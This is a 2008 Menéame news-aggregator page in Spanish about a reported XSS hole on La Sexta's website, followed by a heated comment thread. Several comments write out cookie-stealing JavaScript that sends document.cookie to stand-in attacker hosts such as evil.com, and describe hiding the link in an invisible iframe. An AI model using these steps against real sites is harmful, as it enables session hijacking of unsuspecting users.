369meneos
Agujero de seguridad grave en La Sexta
Se descubre un grave agujero de seguridad en la sexta, motivado, según el autor, por la actuación de el follonero hacia wikipedia (meneame.net/story/programa-follonero-sexta-vandaliza-wikipedia-para-brs), increible lo fácil que parece resultar encontrar agujeros de seguridad en páginas y sistemas de medios de comunicación importantes.
negativos: 1 usuarios: 196 anónimos: 173 compartir: 
menéame
- condiciones legales y de uso
- quiénes somos
- licencias: código, gráficos, contenido
- descargar
- alojamiento en Ferca Network
NoScript es una extensión de Firefox que bloquea los ataques XSS, como este.
noscript.net/
Edit:
No es la primera vulnerabilidad gorda que les pillan: meneame.net/story/simpatico-hackeo-web-oficial-hicisteis
+1.
www.gatovolador.kroaton.net/2008/07/20/descargar-videos-de-internet-2-l
No querías zas, pues toma dos en toda la boca. Que les den...
Follonero la lía con la wikipedia: Menudo cabrón mascachapas...
Cuando el tema nos toca de cerca, cambia mucho la cosa...
Para quedar bien y colarsela a los que no saben, esta bien, pero es poco serio...
Wikipedia: Información gratuita al alcance de quien tenga internet, posibilidad de compartir conocimientos editándola...
Si, cambia mucho la cosa...
Solo te voy a citar lo que ha contestado el propio autor del blog:
A ver Albert y Vii, sois unos ignorantes, al tener código Javascript que se ejecuta y que se puede controlar, basta con crear un enlace, con un código estilo:
_document.location=’evil.com/index.php?c=’+document.cookie+’;_
Para pasar la cookie a un tercero, mediante get.
Para conseguir que alguien visite ese enlace, basta insertarlo en un iframe invisible en cualquier web, y esperar a que vayan cayendo cookies.
Cuanta ignorancia, por dios
Y yo mismo lo he probado, no ... » ver todo el comentario
No creeras que voy a poner la original.. :D
Lo que se consigue con esa "cookie" es una cookie local. Necesitas el password encriptado en MD5 para poder autentificarte como usuario... con esa cookie LOCAL poco podras hacer...
No hace falta que el autor de mas detalles... es que NO los hay :)
Si te molesta que te llame aprendiz por haber descubierto ese pseudobug, chico aprende un poco antes de postear en meneame
rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta3
Felicidades chaval, you're retarded, te has llevado el premio "tontolculo del día"
Vamos, que yo sepa document.cookie muestra la cookie de uno mismo siempre... No devuelve nada que haya guardado en el servidor, y menos lo de otro usuario, asi que no acabo de ver que gana con eso...
Aparte es que se puede ver con su propio ejemplo. Si eso realmente devolviera una cookie de un usuario, entonces si se mete un usuario que no existe no debería devolver nada. Ain embargo su ejemplo con el usuario "lol" que no está registrado (al menos en este momento)., si que muestra una cookie, la nuestra propia.
Edito:
#19 Acabo de leer tu comentario, ahora veo por donde va. Sorry por repetirme :)
Lo primero tu dices:
Esa es una copia para que los aprendices de hacker jueguen ser hacker :D
No creeras que voy a poner la original.. :D
Es la excusa mas pobre que he leído en todo el tiempo que llevo dedicándome profesionalmente a la seguridad, creeme, es la peor. La gente suele decir cosas como: "Es que no es la página definitiva" o cosas así, pero tu excusa no hay por donde cogerla.
Lo segundo, tu dices:
Lo que se consigue con esa "cookie" es una cookie local. Necesitas el password encriptado en MD5 para poder autentificarte como usuario... con esa _coo... » ver todo el comentario
Si existe una posibilidad, de controlar código javascript que entra por los argumentos, como es el caso, para leer la cookie del usuario, en el contexto de su sesión (su cookie local, vaya), se puede crear una petición en lugar de:
alert(document.cookie);
pues:
document.location='paginadelatacante.com/insertarcookie.php?cookie='+document.cookie;
y todo el enlace, con el xss, y ese código inyectado en el, meterlo en un iframe de 0x0 (invisible) en una web que controlemos, ya solo nos f... » ver todo el comentario
Si se loggea como yo y pone un post, me habrá convencido.
Si no, deduciré que es solo una fantasmada...
hace? :)
No es una excusa... es una pagina de pruebas :D
:D
Explotar estos agujeros es un delito tipificado en la ley española, no se si estás al tanto.
Y es un delito, que de denunciar, denunciaría la sexta, y no tu, por lo que nadie va a caer en el juego de explotar este agujero solo para demostrarte nada, estas cosas requieren un uso responsable, y ni mucho menos, nadie se va a poner a hacer ataques contra la sexta por un flame en el meneame, eso sería muy infantil.
resulta un comentario un tanto infantil e hipócrita por tu parte.
Ah, respecto a lo de los fantasmas, has probado a mirarte en un espejo?
#24 Doy fe que esa no es la web de este hombre. Le conozco de varios foros.
Aún así Voyager ni yo mismo me creería la escusa que diste. En meneame tienes más posibilidades de ser creído si dices que eres un HOYGAN borracho :P
Es que estaba volviendo a dudar, ya que me quede pensando que ejecutar la instruccion que lee la cookie lo puede hacer sin necesidad de usar ninguna pagina externa, pero no me daba cuenta que asi solo consigue la cookie del dominio de la web que usamos y no la de la web con la vulnerabilidad ^_^U
> (...) que decian "solo me creo que sepas algo si me hackeaaas, te doy mi ip? la quieres? va va va a ver que h4x0r eres!!"
Mucho mejor los que decían "Soy un jaker peligroso y si me das tu IP te juankeo", y le confesabas que tu IP es la 127.80.13.28... xD
A Voyager (#27 y demás), si una fuente no-fiable ejecuta javascript en tu máquina te ha own3ado, así de sencillo... y, como prueba de concepto, ¿quierer ir a meatspin o prefieres un bucle infinito? :-p
@Voyager, no creo que si supieras a que se dedica @jcarlosn, te atrevieras a comentar como en #30
No lo voy a re-explicar por enésima vez, te recomiendo que leas:
en.wikipedia.org/wiki/Cross-site_scripting#Exploit_scenarios
Donde aclaran todo esto a la perfección.
Ah, espera, que en wikipedia también son unos fantasmas? :)
Culturízate un poco, si vas de sobrao, sin tener ni idea del tema, quedas fatal:
en.wikipedia.org/wiki/Cross-site_scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same _o... » ver todo el comentario
No estamos hablando de un ataque SQL injection, ni BSQL injection... de todas formas, aunque veas que la gente está equivocada, lo mínimo que deberías de hacer es explicarlo y guardar las formas (cosa esta última que se te da muy mal).
Tienes la mirada sucia :)
EDITO: #52 también la mente. La culpa es de los Bloggers que las "suben" como putas
Bastaría con que siguieras un enlace para que tu cookie saliera de tu equipo y fuera a terminar a un servidor QUE NO ES el de la sexta. Tan fácil como eso. Una vez sucedido, el dueño del servidor para el que se haya programado el "exploit" tiene acceso a tu cookie y por tanto a tu sesión.
Repite conmigo: 2+2=4.
:)
Si alguien tiene curiosidad: es.php.net/manual/es/book.session.php
Y ya no voy a seguir, lo siento.
DON'T FEED THE TROLL
Y el resto? Si el admin nunca se pasa por aqui, nunca podremos suplantarle? :D
No veo relación.
Finalizar los mensajes con caritas felices no ayuda xD.
Y es más, me has hecho hasta registrarme tras llevar ya mucho tiempo siendo anónimo :P
Meterse con la iglesia -> no perjudica directamente a nadie.
Meterse con la Wikipedia -> no perjudica directamente a nadie.
Vandalizar la Wikipedia -> puede perjudicar a alguien.
Que se meta con la Wikipedia todo lo que quiera, pero que no altere su información.
El malo se hace una web: www.lasextaeslahostia.com
El malo mete en esa web un iframe (que yo ni sabía lo que era) que lleva un código que empieza por "document.location="
El malo se pasa por los foros de la sexta, Pilar Rubio, Patricia Conde y Buenafuente y le dice a la gente que visto una web que es la leche de buena.
El pardillo entra en la web www.lasextaeslahostia.com y se activa el código del iframe, que manda las cookies del pardillo (las que tiene en su ordenador para entrar en www.lasexta.com) a la web del malo.
El malo tiene el user + pass del pardillo.
Si me he equivocado, es culpa vuestra que no hay quien os entienda. :-P
P.D: #20 No sé qué has puesto en ese enlace que se me ha encendido el Firefox+script como nunca.
soy el unico que le suena a chino todo eso de exploit y XSS?
no te acostaras....
Es decir, como fallo de seguridad, en concepto, es grave, pero a la hora de la verdad, dudo que un admin competente entre a ese enlace.
Pero ahi ya entra lo que cada uno considere grave, si la posibilidad, o el riesgo real. Y por eso se ha montado todo este pollo.
meneame.net/story/programa-follonero-sexta-vandaliza-wikipedia-para-br3
No es un fallo de seguridad GRAVE, en todo caso un fallo de seguridad en la escala de Secunia "Less Critical (2 of 5)"
Debido a que ese foro no lo conoce ni Dios, quien va a querer entrar el el foro de la Sexta habiendo MILLONES de foros mejores y dudo que alguien que lo visite se registre y te mande sus cookies, ya que es abierto a visitantes...
para lo que hay que ver ahi quien se va a registrar...
Un poco de humildad, que te crees Dios... dime de que presumes...
Y me da igual que tu o tus neonicks o palmeros me voten negativo... si me pusiera a hacer lo mismo que vosotros estaria a vuestro nivel.
Un poco de madurez, chavales...
Vamos, que el follonero si se entera, no va a entender que puede repercutir este fallo contra el gran fallo de modificar la wiki.
SI al menos hubierais descubierto como modificar la web del follonero
www.lasexta.com/programa/salvados/eurocopa/471
pues eso si que sería grave (al menos para él)
Basta con que uses este XSS para obtener la cookie del admin, con eso tendrás acceso de escritura a la web y podrás cambiar la foto del tipo ese por la de un perro haciendo caca. ¿Contento?
Yo flipo como tanta gente "entiende" de seguridad, pero solo cuando pueden ejecutar un exploit... menuda panda de lamers.
Es decir, para conseguir la cookie de admin, admin debe ejecutar el exploit. Y aunque lo ejecutara. sólo podrías modificar su foro, no la web completa...
Saludos de un "lammer"
Prueba de ello es que aun nadie ha modificado la web. A estar alturas deberia estar ya modificada.
Estamos hablando en términos de seguridad mas o menos serios, que nos importa lo que diga un troll que ya se ha visto que solo busca crear un flame? es un troll de libro.
ya lo dije arriba: DON'T FEED THE TROLL
Va a continuar diciendo lo que dice una y otra vez, para alargar el flame.
Quien tenga ojos que lea.
El blog "desvarios informáticos" (por cierto nombre apropiado) fue creado el 28-8-2008 a las 21:05
Sólo tiene dos artículos, creados a la misma hora...
Hmmm... aquí alguien quiere ocultar algo! :-D
rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta/
rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta9
"Pues nose, igual tu y tu abuela tuerta sois los reyes del universo, porque yo he estudiado informática y no sé hacer esto.. será que soy de redes."
Cuanto daño hace la sgae :)